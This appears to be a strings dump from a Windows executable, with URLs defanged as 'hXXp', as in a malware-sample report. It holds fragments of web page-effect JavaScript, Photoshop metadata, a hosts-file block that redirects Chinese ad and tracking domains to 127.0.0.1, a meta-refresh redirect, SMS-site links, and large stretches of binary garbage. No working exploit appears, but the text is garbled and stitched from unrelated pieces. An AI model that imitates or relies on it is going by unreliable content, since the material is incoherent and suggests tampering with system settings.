<xapMM:DocumentID>adobe:docid:photoshop:66f63ebf-961c-11d8-99b2-c7e24cea3f52</xapMM:DocumentID>
%,{.xp
*[.bU
.Lpu=
E.hv>]v
Windows
5J.Pq
j^.Kx<'
,5%FxXJ
Windows 7 64
hXXp://VVV.2345.com/?k714307168
.STYLE1 {font-size: medium}
<bgsound src="13557853.mp3-xcode=888415dce9dcabc57c370964f995582b&mid=0.98297898353513" tppabs="hXXp://zhangmenshiting2.baidu.com/data2/music/13557853/13557853.mp3?xcode=888415dce9dcabc57c370964f995582b&mid=0.98297898353513" loop="-1">
var msg = "
if (!window.addEventListener && !window.attachEvent || !document.createElement) return;
msg = msg.split('');
var n = msg.length - 1, a = Math.round(size * diameter * 0.208333), currStep = 20,
o = document.createElement('div'), oi = document.createElement('div'),
b = document.compatMode && document.compatMode != "BackCompat"? document.documentElement : document.body,
e = e || window.event;
ymouse = !isNaN(e.pageY)? e.pageY : e.clientY; // y-position
xmouse = !isNaN(e.pageX)? e.pageX : e.clientX; // x-position
if(init.nopy){
o.style.top = (b || document.body).scrollTop   'px';
o.style.left = (b || document.body).scrollLeft   'px';
d = document.getElementById('iemsg'   i).style;
d.top = Math.round(y[i]   a * Math.sin((currStep   i) / letter_spacing) * circleY - 15)   'px';
d.left = Math.round(x[i]   a * Math.cos((currStep   i) / letter_spacing) * circleX)   'px';
if(!isNaN(window.pageYOffset)){
ymouse  = window.pageYOffset;
xmouse  = window.pageXOffset;
} else init.nopy = true;
d = document.createElement('div'); d.id = 'iemsg'   i;
d.style.height = d.style.width = a   'px';
d.appendChild(document.createTextNode(msg[i]));
oi.appendChild(d); y[i] = x[i] = Y[i] = X[i] = 0;
o.appendChild(oi); document.body.appendChild(o);
ymouse  = window.pageYOffset;
xmouse  = window.pageXOffset;
window.removeEventListener('scroll', ascroll, false);
o.id = 'outerCircleText'; o.style.fontSize = size   'px';
if (window.addEventListener){
window.addEventListener('load', init, false);
document.addEventListener('mouseover', mouse, false);
document.addEventListener('mousemove', mouse, false);
if (/Apple/.test(navigator.vendor))
window.addEventListener('scroll', ascroll, false);
else if (window.attachEvent){
window.attachEvent('onload', init);
document.attachEvent('onmousemove', mouse);
* This script should function in any browser that supports document.getElementById
* It has been tested in Netscape7, Mozilla Firefox 1.0, and Internet Explorer 6
* splits par.firstChild.data into 1 span for each letter
var str=span.firstChild.data;
var a=str.length;
span.removeChild(span.firstChild);
var theSpan=document.createElement("SPAN");
theSpan.appendChild(document.createTextNode(str.charAt(i)));
span.appendChild(theSpan);
this.deg=(deg==null?360:Math.abs(deg));
this.hue=(hue==null?0:Math.abs(hue)60);
this.hspd=(hspd==null?3:Math.abs(hspd)60);
this.length=span.firstChild.data.length;
this.span=span;
this.speed=(spd==null?50:Math.abs(spd));
this.hInc=this.deg/this.length;
this.brt=(brt==null?255:Math.abs(brt)%6);
this.timer=null;
this.moveRainbow();
RainbowSpan.prototype.moveRainbow = function() {
if(this.hue>359) this.hue-=360;
var b=this.brt;
var a=this.length;
var h=this.hue;
if(h<60) { color=Math.floor(((h)/60)*b); red=b;grn=color;blu=0; }
else if(h<120) { color=Math.floor(((h-60)/60)*b); red=b-color;grn=b;blu=0; }
else if(h<180) { color=Math.floor(((h-120)/60)*b); red=0;grn=b;blu=color; }
else if(h<240) { color=Math.floor(((h-180)/60)*b); red=0;grn=b-color;blu=b; }
else if(h<300) { color=Math.floor(((h-240)/60)*b); red=color;grn=0;blu=b; }
else { color=Math.floor(((h-300)/60)*b); red=b;grn=0;blu=b-color; }
h =this.hInc;
this.span.childNodes[i].style.color="rgb(" red ", " grn ", " blu ")";
this.hue =this.hspd;
background-image:url();
var r1=document.getElementById("r1"); //get span to apply rainbow
myRainbowSpan.timer=window.setInterval("myRainbowSpan.moveRainbow()", myRainbowSpan.speed);
var r2=document.getElementById("r2"); //get span to apply rainbow
myRainbowSpan2.timer=window.setInterval("myRainbowSpan2.moveRainbow()", myRainbowSpan2.speed);
'); return false" NOOP="if (window.event != null && window.event.button == 2) alert ('Thanks...');">
var msg = "";
msg = msg.split(');
if (document.all||document.getElementById){
document.write('<font color="' neonbasecolor '">')
for (m=0;m<message.length;m  )
document.write('<span id="neonlight' m '">' message.charAt(m) '</span>')
document.write('</font>')
document.write(message)
var crossobj=document.all? eval("document.all.neonlight" number) : document.getElementById("neonlight" number)
//eval("document.all.neonlight" m).style.color=neonbasecolor
crossref(m).style.color=neonbasecolor
crossref(n).style.color=neontextcolor
if (n<message.length-1)
if (document.all||document.getElementById)
<img src="hXXp://i7.topit.me/7/3b/fa/1177856673f6afa3b7l.jpg" align="middle" border="0"><br />
/*Important Function to blend the tabs in and out*/
function blendoff(idname) {document.getElementById(idname).style.display = 'none';}
function blendon(idname) {document.getElementById(idname).style.display = 'block';}
document.getElementById('tablink1').className='tab1 tabactive';
document.getElementById('tablink2').className='tab2';
document.getElementById('tablink3').className='tab3';
document.getElementById('tablink4').className='tab4';
document.getElementById('tablink1').className='tab1';
document.getElementById('tablink2').className='tab2 tabactive';
document.getElementById('tablink3').className='tab3 tabactive';
document.getElementById('tablink4').className='tab4 tabactive';
var w3c=document.getElementById && !window.opera;;
var ie45=document.all && !window.opera;
var matrix=(w3c)?document.getElementById("matrix"):document.all["matrix"];
ma_txt=(w3c)?matrix.firstChild.nodeValue:matrix.innerHTML;
columns=ma_txt.length;
while (matrix.childNodes.length) matrix.removeChild(matrix.childNodes[0]);
ma_tab=document.createElement("table");
ma_tab.setAttribute("border", 0);
ma_tab.setAttribute("align", effectalign);
ma_tab.style.backgroundColor="#000000";
ma_bod=document.createElement("tbody");
ma_row=document.createElement("tr");
matemp=document.createElement("td");
matemp.setAttribute("id", "Mx" x "y" y);
matemp.className="matrix";
matemp.appendChild(document.createTextNode(String.fronCharCode(160)));
ma_row.appendChild(matemp);
ma_bod.appendChild(ma_row);
ma_tab.appendChild(ma_bod);
matrix.appendChild(ma_tab);
matrix.innerHTML=ma_tab;
ma_cho =String.fronCharCode(32 Math.floor(Math.random()*94));
matemp=document.getElementById("Mx" (ma_row-1) "y" y);
matemp.firstChild.nodeValue=m_coch[y];
matemp=document.all["Mx" (ma_row-1) "y" y];
matemp.innerHTML=m_coch[y];
matemp.style.color="#FF0000";
matemp.style.fontWeight="bold";
matemp=(w3c)?document.getElementById("Mx" (ma_row-2) "y" y):document.all["Mx" (ma_row-2) "y" y];
matemp.style.fontWeight="normal";
matemp=(w3c)?document.getElementById("Mx" (ma_row-3) "y" y):document.all["Mx" (ma_row-3) "y" y];
if (ma_row<Math.floor(rows/2) 1) m_copo[y]  ;
else if (ma_row==Math.floor(rows/2) 1 && m_coch[y]==ma_txt.charAt(y)) zoomer(y);
else if (Math.random()>0.9 && m_copo[y]<100) {
m_coch[y]=ma_cho.charAt(Math.floor(Math.random()*ma_cho.length));
if (m_copo[ycol]==Math.floor(rows/2) 1) {
mtmp=document.getElementById("Mx" ytmp "y" ycol);
mtmp.firstChild.nodeValue=m_coch[ycol];
mtmp=document.all["Mx" ytmp "y" ycol];
mtmp.innerHTML=m_coch[ycol];
mtmp.style.color="#FF0000";
mtmp.style.fontWeight="bold";
if (Math.random()<reveal) {
mtmp=ma_cho.indexOf(ma_txt.charAt(ycol));
ma_cho=ma_cho.substring(0, mtmp) ma_cho.substring(mtmp 1, ma_cho.length);
if (Math.random()<reveal-1) ma_cho=ma_cho.substring(0, ma_cho.length-1);
mtmp=document.getElementById("Mx" (m_copo[ycol]-201) "y" ycol);
mtem=document.getElementById("Mx" (200 rows-m_copo[ycol]--) "y" ycol);
mtmp=document.all["Mx" (m_copo[ycol]-201) "y" ycol];
mtem=document.all["Mx" (200 rows-m_copo[ycol]--) "y" ycol];
mtmp.style.fontWeight="normal";
mtem.style.fontWeight="normal";
else if (m_copo[ycol]==200) m_copo[ycol]=100 Math.floor(rows/2);
mtmp=document.getElementById("Mx" (m_copo[ycol]-101) "y" ycol);
mtmp.firstChild.nodeValue=String.fronCharCode(160);
mtem=document.getElementById("Mx" (100 rows-m_copo[ycol]--) "y" ycol);
mtem.firstChild.nodeValue=String.fronCharCode(160);
mtmp=document.all["Mx" (m_copo[ycol]-101) "y" ycol];
mtmp.innerHTML=String.fronCharCode(160);
mtem=document.all["Mx" (100 rows-m_copo[ycol]--) "y" ycol];
mtem.innerHTML=String.fronCharCode(160);
document.getElementById("fade1").style.color="rgb("   col   ",0,0)";
document.getElementById("fade2").style.color="rgb("   col   ",0,0)";
document.getElementById("fade3").style.color="rgb("   col   ",0,0)";
document.getElementById("fade4").style.color="rgb("   col   ",0,0)";
document.getElementById("fade5").style.color="rgb("   col   ",0,0)";
document.getElementById("fade6").style.color="rgb("   col   ",0,0)";
document.onselectstart=new Function ("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
<embed src="hXXp://player.yinyuetai.com/video/player/688869/a_0.swf" type="application/x-shockwave-flash" width="550" height="400" quality="high" />
(*.jpg)|*.jpg
!!$!149! )
!$!!$)!$)!09
9!(1!$)!$!),)),1
$))01)49
!$!101)()
$!1<9)89!,1
!)(1149!$!
$!!,))89!01
()!,))89)41
!!())01)01)01!,1
!),1)01189)01!,)
$)!,1!,1
!)411<9)49),1!()
$))01!()!()
! !),)101
!),)101),)
)0)141141! !
$)),1189)49!,)
)0)141!(!
)()989)0)
10)181),)
9419<1)()
)(!981941!
1419<114)
18114)),!
!$!181981!
)$!981981),)! !
),)181141
)(!9<9989)0)
141981),)
!(!981981
),)9<9)0)
)()941981941981)$!!
141141!$
!(!10)10)
1(!90198110)!$
)(!10))(!!
1,!94)981),!!
90)90))$
)$!1,))(!!
)(!10))(!
)$!90)90))$
F%dT?e
8.YK*
RNx,?%X`hE
ugm%f
888888888
hXXp://qq.eoool.com/QQCeSuan/YuanAsk.aspxV
*.exe
|*.exe|
|*.ico|
2013:09:28 16:50:44
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="C8CC4B99E0F8C907029A0419637F03A6" xmpMM:InstanceID="xmp.iid:09E6C70F1B28E311BE54ED4E3F4C7704" xmpMM:OriginalDocumentID="C8CC4B99E0F8C907029A0419637F03A6" dc:format="image/jpeg" photoshop:ColorMode="3" xmp:CreateDate="2013-09-28T16:08:20 08:00" xmp:ModifyDate="2013-09-28T16:50:44 08:00" xmp:MetadataDate="2013-09-28T16:50:44 08:00"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:09E6C70F1B28E311BE54ED4E3F4C7704" stEvt:when="2013-09-28T16:50:44 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
15808528888
hXXp://www1.poco.cn/reg1/reg.php?referer=http://my.poco.cn/
VVV.baidu.com
hXXp://VVV.baidu.com/s?wd=天气预报&rsv_bp=0&ch=&tn=baidu&bar=&rsv_spt=3&ie=utf-8&rsv_sug3=3&rsv_sug=1&rsv_sug1=3&rsv_sug4=234&inputT=2937
hXXp://show.v.t.qq.com/index.php?c=show&a=index&n=miniaumcc&w=0&h=348&fl=1&l=30&o=17&co=1
127.0.0.1 a.baidu.com
127.0.0.1 mcfg.sandai.net
127.0.0.1 biz5.sandai.net
127.0.0.1 server1.adpolestar.net
127.0.0.1 advstat.xunlei.com
127.0.0.1 mpv.sandai.net
127.0.0.1 casting.openv.com
127.0.0.1 m.openv.tv
127.0.0.1 uniclick.openv.com
127.0.0.1 86file.megajoy.com
127.0.0.1 86get.joy.cn
127.0.0.1 86log.joy.cn
127.0.0.1 1.allyes.com.cn
127.0.0.1 analytics.ku6.com
127.0.0.1 gug.ku6cdn.com
127.0.0.1 ku6.allyes.com
127.0.0.1 ku6afp.allyes.com
127.0.0.1 pq.stat.ku6.com
127.0.0.1 st.vq.ku6.cn
127.0.0.1 stat0.888.ku6.com
127.0.0.1 stat1.888.ku6.com
127.0.0.1 stat2.888.ku6.com
127.0.0.1 stat3.888.ku6.com
127.0.0.1 static.ku6.com
127.0.0.1 v0.stat.ku6.com
127.0.0.1 v1.stat.ku6.com
127.0.0.1 v2.stat.ku6.com
127.0.0.1 v3.stat.ku6.com
127.0.0.1 adextensioncontrol.tudou.com
127.0.0.1 adplay.tudou.com
127.0.0.1 tdcm.tudou.com
127.0.0.1 iwstat.tudou.com
127.0.0.1 nstat.tudou.com
127.0.0.1 stat.tudou.com
127.0.0.1 stats.tudou.com
127.0.0.1 img4.tdimg.com
127.0.0.1 ua5.tdimg.com
127.0.0.1 ua4.tdimg.com
127.0.0.1 pole.6rooms.com
127.0.0.1 shrek.6.cn
127.0.0.1 simba.6.cn
127.0.0.1 union.6.cn
127.0.0.1 acs.56.com
127.0.0.1 acs.agent.56.com
127.0.0.1 acs.agent.v-56.com
127.0.0.1 bill.agent.56.com
127.0.0.1 bill.agent.v-56.com
127.0.0.1 stat.56.com
127.0.0.1 stat2.corp.56.com
127.0.0.1 union.56.com
127.0.0.1 uvimage.56.com
127.0.0.1 v16.56.com
127.0.0.1 images.sohu.com
127.0.0.1 pro.letv.com
127.0.0.1 pp2.pptv.com
127.0.0.1 dcads.sina.com.cn
127.0.0.1 a.cctv.com
127.0.0.1 a.cntv.cn
127.0.0.1 ad.cctv.com
127.0.0.1 d.cntv.cn
127.0.0.1 adguanggao.eee114.com
127.0.0.1 cctv.adsunion.com
127.0.0.1 afp.qiyi.com
127.0.0.1 focusbaiduafp.allyes.com
127.0.0.1 baidutv.baidu.com
127.0.0.1 bar.baidu.com
127.0.0.1 c.baidu.com
127.0.0.1 cjhq.baidu.com
127.0.0.1 cpro.baidu.com
127.0.0.1 drmcmm.baidu.com
127.0.0.1 e.baidu.com
127.0.0.1 eiv.baidu.com
127.0.0.1 hc.baidu.com
127.0.0.1 hm.baidu.com
127.0.0.1 ma.baidu.com
127.0.0.1 nsclick.baidu.com
127.0.0.1 spcode.baidu.com
127.0.0.1 tk.baidu.com
127.0.0.1 union.baidu.com
127.0.0.1 ucstat.baidu.com
127.0.0.1 utility.baidu.com
127.0.0.1 utk.baidu.com
127.0.0.1 atm.youku.com
127.0.0.1 Fvid.atm.youku.com
127.0.0.1 html.atm.youku.com
127.0.0.1 valb.atm.youku.com
127.0.0.1 valf.atm.youku.com
127.0.0.1 valo.atm.youku.com
127.0.0.1 valp.atm.youku.com
127.0.0.1 lstat.youku.com
127.0.0.1 speed.lstat.youku.com
127.0.0.1 urchin.lstat.youku.com
127.0.0.1 stat.youku.com
127.0.0.1 static.lstat.youku.com
127.0.0.1 valc.atm.youku.com
127.0.0.1 vid.atm.youku.com
127.0.0.1 walp.atm.youku.com
1%dg(?
_A%d|{
.MJM>
4c:.SQnR{ 
Windows XP
Windows 7
Windows
ICO|*.ico|
jpg/bmp/gif|*.jpg;*.bmp;*.gif
.dVeQ^
Do.mb=6V
%fwu7L
VVV.i9jy.com
[2013]0868-0258
).Kwa\
*7.nP
.pH1V
CG-/K{Q%D
uÍc
5%Cqd
.zIpO
.kX9j
hXXp://dreamartists.com/wagonindex.html
J%SzI
0B}%u
hXXp://webPTF.bbs.hnol.net/dysr/201001/CCTV_very/CNTV_20100802.htmV
1376360281
hXXp://VVV.2345.com/?k1365467801
hXXp://user.qzone.qq.com/841751838/infocenter
@qq.com
@163.com
3000000
4000000
ed2k://|file|(IBW-248).AVI|1515708928|20E0DE6329B50C2566CBCCB706FAF989|/
w7D666D666D888D
*$%u,
.XE.i
.prn9
%Fydv)
5C.pZ
Z.sNP
.ay9*
C:\Users\admin\Desktop\
\gfqbczxy.htmlv
K.mIT
IJ.nYb1
î=#.Wx
jI%k%x
zJT%f
>.xcD
.Uni{9
.Hj)J5
- .eP
7.Nu'{r
.EF.WU=
g.Ee}
iK.XL2
\%ugn
hXXp://ssl.qkm.cc/ceshi
hXXp://ebook.3g.qq.com/
jpg|*.jpg|gif|*.gif|bmp|*.bmp
LQO275497 0.EJH
-0.adbwzx
&(213>/2:' ,(- 275& )
*/.MQR
2=-q}k
' (/('/%'/% 3)08- *
%0 %/"",
&-&&.$"*
2C.IZEct_
)6 7D.AN8CP:?M5KZ?Q`ESaIYgOco[amYZeUZeUFPC[eXmwj
=yy%fgD
8D2KWEBN<1= &2 (4"'3!
/<&,9#!.
&1!/9, 5(&0# *
/9,1;.-7*
)5!,8$$1
-cnA}
%0 *5%&0#
1@%?M5N[EXeOUaMMYG1<,&1!
*5!4>-%/
/@%->#$4
%/"#- ! 
,6)%/" *
nq~her\[iQK]>BV3;N-<O.BT5?Q41B'#4
-7*1;.'1$
$.!0:-3=0
5?25?2#-
-7*2=-2=- 7%!-
)6  8",9#/<&3@*/<&"/
1;.LVI:D7
2A%:I.CR7CQ9=K31>(-:$4@,GS?t
%7 *;&"3
0='.;%&4
)5#1=)-9%&2
(4 ,8$6B.KWCYfP
-9}.^kU
6B.EQ=?L6 ;$
2>,BN:9E1.;%S`Jv
#6#5H5EXETgT]q^l
2!)< =Q>BYCMdNWnX]u]]u]XpXRjRVoU`y_o
cm`WbRITDDP>EQ?XdR]iUDP<>J62?)6C-S`Jy
4O.UpO
-<.APBSbT_n`gvhjzi_p[SeNHZCHYDO`KN_JAR=3D/-= %5#
%C %@
*6"2@.TdSo
t.vj8}rC
,B%7M05K.QgJ}
02.UW5^`9bd3_`0\]-[\%QR
!7%':))< ';("6#
grb*5%DO?
"4#%8%&9&%8##8"
!6 #7$!5"
(;(9L9EXEBUB?R?GZGUhU@S@0C0/B/(;(
';$)=
8F.ZhP|
":"$<$%;#!7
HJ-SUCfiWz}d
!3");**< $6%
-=o.=M6N^Geu^u
tq}kmyeXeOLZB?M55C ,:"%3
sS{iQygO|iDua6kW.eR)cQ$_Q)g[H
$,%2:3%-&
#-!2<0%/#
%)$(/($,!
DQC(5%u
-<.BOAR_Qfsey
U`P*5%u
 7#,8$&2
4@.ZfT
Zb%dnb
.KFOol
5kh.ce
)du%fv
/ %C?1YV
.-\
w&dU%cV
Nvt.YQ
Aj.Vz
0tn.ql
%SD9hV
&%S{y
564/0.\][
&!-3.BECnqo
2:34<5/704<5|
2:3/703;4
08.4<2%/#! 
'1%#-!$.".8,/9-",
$.!1;.5?3'1%
04.bj`
(2%U_R
1;.,7'*4'
.8 '1$.8 ,6)
 4'%.!"'
1;.HRE?I<#-!
,6*/9-! 
0:.ktj
#-!-7 3=15?3,9 0=/
.;-)6( 8*
-:,!. %/"
,8&9E3DO?JUER]MVaQT_OJUE>H;6@3,6) 5(,6*-7 /9-0:..8,,6*39.BH=
*0%FLA
*5%,7'(3#",
-5.QZPqzp
$."-7 0:.*4(#-!7=2
(0&08.OWMhlf
/:0-8.&1'!,"-6,
%.$-5 5=3# !8@6
%/#-7 )3'
dkfT\UKSLFOECLB;C96>4070-4-/3.,0 '*("%#-3.NTOu{v
&&&444!!!
-0.inl
/0.tus
}wxvopnijhefd^_]\][XYWTUSQRPOPNNOMNOM9:89:8786342-.,()'&'%%&$&'%* )01/34234212001//0.EFDOPN[\Zab`declmk{|z
01/#$"}~|
z{yyzxvwursqlmkdec[\ZUVTOPNLMKGHF@A?675,- #$"
&'#1CDBQRP\][efdmnlrsq
"#!()ÞApqm
/0.TUSyzx
VVV...
```===###
...MMMiiiyyy
|||333!!!]]]
   666???
'''   """
...EEErrr
%%%SSS
"""222333"""
___@@@777===222
^^^999***
^^^666 ---\\\
{{{///###
^^^555"""
...eee
&&&444;;;
666555!!!
qqqjjjooohhhVVVBBB;;;DDDOOOSSSHHHBBB:::333,,,"""
%%Ýd
%%ÿf
(((@@@```
~~~```:::
!!!%%%((()))(((&&&$$$!!!"""***>>>\\\}}}
u%X.<7
EXE|*.exe|DLL|*.dll|*.*|*.*
.WM8U
(E.iM
.IIFqK
mAE.yJR
.yr9*m
%.YN)
Bi%9U
.ZqUi
 7.KF
.nJkY`r
oi.YJ
gY%UJJ3
hXXp://VVV.2345.com/?kviptgas
hXXp://VVV.2345.com/?kvip6k/
hXXp://VVV.baidu.com
<meta http-equiv="refresh" content="0;url=
hXXp://junzhe.phpnet.us/ (
hXXp://VVV.80x08.com/sms1/ (
hXXp://3-shang.com/sms/ (
*.gft
|*.gft
*.**.****
qq.exe
Resource.*.**.****
Res.rdb
Default.rdb
Res.rdb
Default.rdb
Res.rdb
1.2.18
inflate 1.1.3 Copyright 1995-1998 Mark Adler
?%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
CCmdTarget
MSH_SCROLL_LINES_MSG
MSWHEEL_ROLLMSG
__MSVCRT_HEAP_SELECT
>0123456789ABCDEF deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
%$%,%4%<%
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%
b%c%d%e%f%g%h%i%j%k%l%
W%X%Y%Z%[%
Z%T%i%f%`%P%l%
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
%,%$%4%<%
eZl%u
Q.YeY
R:\Sg|p5rL
e$e#e e4e5e7e6e8eKuHeVeUeMeXe^e]erexe
s4s/s)s%s>sNsOs
qq!r!x!/!L"k!^!-!y"_!`!!&"&#&$&%&&&'&(&)&*& &,&-&.&/&0&1&2&3&4&5&6&7&8&A&B&C&D&E&F&G&H&I&J&K&L&M&N&O&P&Q&R&S&T&U&V&W&X&''!'"'#'$'%'&'(')'*' ','-'.'/'0'1'2'3'4'5'6'7'8'9':';'<'='>'?'@'A'Q'R'S'T'U'V'X'Y'Z'['\']'^'_'`'a'b'c'd'e'f'g'h'i'j'k'l'm'n'o'p'q'W'>!=!B!F!G!H!I!w"x"E!D!s"l!m!("n!r" ","*"-"M"N"O"_"P"`":";"]!e"g"g!\"J"K"A"@"i"j"h!h"f"b"b!a"e!f!c"d">"?"<"="]"^"!(,("(-(#(.($(/(&(1(%(0('(<(7(2()(>(9(4(((8(=(3(*(:(?(5( (;(@(6(#"""%"$"'"&"!"~!{!}!|!~"z!y!j!i!v"u"t"!!"!#!7!9!:!;!R!S!T!U!V!W!X!Y!Z![!)"."L!M!A!!$"$#$$$%$&$'$($)$*$ $,$-$.$/$0$1$2$3$4$5$6$7$8$9$:$;$<$=$>$?$@$A$B$C$D$E$F$G$H$I$J$K$L$M$N$O$P$Q$R$S$T$U$V$W$X$Y$Z$[$\$]$^$_$`$a$b$c$d$e$f$g$h$i$j$k$l$m$n$o$p$q$r$s$ !,!5!6!!%"%#%$%%%&%'%(%)%*% %,%-%.%/%0%1%2%3%4%5%6%7%8%9%:%;%<$=%>%?%@%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%b%c%d%e%f%g%h%i%j%k%l%m%n%o%p%q%r%s%t%u%v%&!<!3!4!l0zC7<|Kf>0;e><2TI?M"P/1n3#P$@BRV5:Jg>>NBJ$PfC%Pz6&P]40Cg<'P(P)P5GW57GcFC83KIi*Ph> P52e6p8iL&VpM}FE5,P-P;N=MhA/Pv;sF2P>1_8^8f0KOJO3:!03P4P5P4K6Pr8g0rK|5}5~5bD<N7P8P9PM?:=N?>P<P=PX5#:p2;P:P)JF;E;>B?PUIg@8!@PBPeBaNJ0AP>2D6gCo7CP$Gk4DPK0`8l4zI2HY5q2gPAElGFP<HbN-?G;w;@2QD"CJPL0cD;=4:$MNB?2IP>MEPGPn:HP$UPPSPQPB2;JKPOPs8H;&4TPLPcNx;MPRPUPNP!6M0"6A2%UyKnIt8/?7NXJ87½2S=YP^P\PWP/BZP]P[P]JXP.?sK_P`P$=mPPG6IhPpJ62lPfPoPRAD8\GG`nP]EcPv8u8aPZ<iPoJMCePq7bPjPdPQNkPAOf6p7pPqPuPN0PJtPsPwPvPdDr7xPE<&BeDv6yP65zP|P5Kf71;wH{PE:CM~P#Q}PD:}=97$QO6!Q"Q/F|A#6MK%Q=N&Q)Q'QNA(Q*Q,Q QHJ75.Q/Q/2-Qt<2Q1Q0QVP3Q~=4Q%MYL6Q5Q8Q7Q9Q:Qt058;7<={C$6h@w8n9<QHLFEy;;Q=Q^Eu3>Q~F4A@QAQ,Hx8;OBQ&6<J6Bq65Es7CQDQbF_1GQ}:FQF:HQnfIQAKJQKQLQi>L<'4OQMQ=LNQZIPQQQRQ_EVQTQUQSQc:WQjLdNXQ(@YQZ=ZQ|C?N`EER[Q%tE6\Q^Kh=|B^QdF_Q`Q.3aQ'6LFz1P=!HbQaEO?cQ,JZ@"4)4dQfQ:7eQsNi==HLJgQxMhQiQ~EjQ)@~:t7kQI;o9fDmQ'Bo:nQoQ0AlQqQ6Kd9pQu7^:mGtQrQ{Ij>{Qd3uQsQOAwQvQD3`7|Q-NxQ}QzQyQONy8C2tNu=XEe9"R#ReN O%Rz8$R/3&RVK<D&MYJ'RUp0F(R*43L!>)RgJ-R*@*RP6 R 4.7.R/R0R1R[<{8^LhLwFqJ2R3R5R7R6R8R=2LK|:9RYA">)6:R[H;R<R=R>R$Ih6e0?F?R==i@AR@R#>a8CR>HDR\H4BnB(6nF1CnGNKFRj@57GRHR,1u0m4(BQ5qMKR72JR*6LRqLMRRN|868NRPROR_?91^1QRRR78SRn52;TRtK5:Z5'MPA?H}<G=h<u<v=@HWRC1QA}8E8g6[R!C~B 6$>\RZRD2fB8<K;&1p3f9J;]R^RI5F3g9H5_DF>L!9yMGE~8/7gRc6JK]HfR^4aRbRdReR[5a?-JcR_Rc8`R$OrJhDb8p9hR]FlR~<v<oRmR#LjRsRnRqRF8?LrRtRvRp:BOkRiRuRpRxR#SzR~R!S{R>Si:13yR%Sv0$S%0JI"S|RwR}RH:&Sw0/S'S(S%>iK-S,S/E.S S416:0?)SbE*S"04S#M'>:S9S0SCB1SoB6S&>3SdL<77S8S5S;S2SASFSBS=SGS1AIS"9?S}CCS<S-4n4e3DS@Sv7JSHSSAJ5,6ESt6D1NSLS'TQSKSOSMSL;PSSSXSVSUS2CE2RSTS(>31WS^2bS|>^S\S]S_S=19AYSZSz3aSo4dS`ScS.JUF8HfSeSE3gSjSiShS9GkSlSnSmSpSsSqSoSrStSuSvSwSxSEQ|<M;s2x0DCyS$:O0^?zSG8q9|S{S`J}S!T~S"T#Tw7`1$T&T%T(TZE)T50_:=7OC*T T-T.Td:Q67K,T/TA:#93T%:3C0TZD4Tb?2T5T?76T7T$9@39T:T;T8T1T<T=TdKk>?T@T>TBT8Gh0VICT}>9<]Gp4k:YK2Fx7OBATDTDBETFTHTiD.4!ta1sJl>HEf:NT=J]Nt2JT:AMTcEIEdE9HMDI:ITv16EKTGTP?OTN=-6PThJ}AFDRTOKSTXT/JWTQTTTVT&:IJYTECu2m>[TZTh9\T^T]T`TUTbTaT_TN;Q?TAcT<@m0dG[DeTdTfTgThTiTQJjTF2kT<M03IRH=?BlTkL4LnTgB7E@BWIoTpT{1:<qTP0rTsTb1q4`FtJwTUAvT@7[KuTeEyTxT{TzT|1|T)>~T%C}T3Jw=[E!U%9"U!G^HQL%G U85EM/L,V#U&UEB8KJE'UeKJ:*>(UP;O;90H8 @Q0,U-U*U81/4)UEL1I(0y0Q;R0#02U0U<L3U1U/U1?.UZJd87U8U >4U,OLG6U':9UXI:U5U;L^G;U2I<U@U=UG2?U;<>Uy7LUEUBUdCAUCUDUFUGUr4IUHUJUn>MU\DE1KUNUOURUPUQUR;SU&9TUz;8BUUVUZ;'9RL(5I8WUX3XU9BYU#VZU[U\U^U_U`UpB'1i<B0WA045<(9fE!=14hCjD8095uJB<R5k@<<(MaU\5K:23c1,>H2bUFMI=d<cUs4RF)LdUeUYIgU(4w6fU242?kU!;I2jUhUlUiU GM\3?mU@NnUpU~CoU#@{;PBw<uIl@M<qU->rUsUS0:BR?tU3F.>/>uUm@0>vUwU`LxUF6"=yUzU\<,?tFT?xH"GI6{Uo5|U~6OF02S;}U"V!V}6~U8E0BKEH<XAzM$V%VVF3;'V(V)Vt4*V V,2;Ad4-V(LRBY3/V1V_4.V0V3V2V4V5V=F.6e26V;V9VwJvJgE8VT=7Vr?<Vj:BVCV=V33>VGVFVEVAV@VDVxJKVHVJVrMIV?Vs?LV7:MVNVQVPVOVhE:VWVSVRVTVUVXVfNYVVVZV`4[V]V\V^V_Vn@#=d=cA)98:*9p5`V9:J8aV&LCGbV 9,4'CR6T;[IAHcVu4fV!DeVdVgVkDc?U;J@SB"5"DhViVo>9KlVkVjV}IsVZKmVoVkKnVpV(HqV>JrV34?J/GtVuV,944vV88DM)Mv4xV#D-91>_H2>x=lDyJ9E.9\IyVYEB:K8mDC0n=/9GMzV{VQG|VwN-O~V}VG3!W$W%W#W@I3>'W&W"W(W)W*W-W W,W.Wd1nD/Wz7v26G0W{F[J1W.O2W@J5W!P1P0<uF6W]5$Dz07W&J09PCoDoL98L88W9W?We<%D/6:W IFC;W<W06=W>W@WvEAWBWCW4W3WDWA7'IL:7I&DKIEW4>F1FWGWrL`HJW}1,@IWHWB7TBNWLWKW'Ne8y=MWLE>=@FQWPWOWRWf8SW|I[=TWyHAF'D0EUW 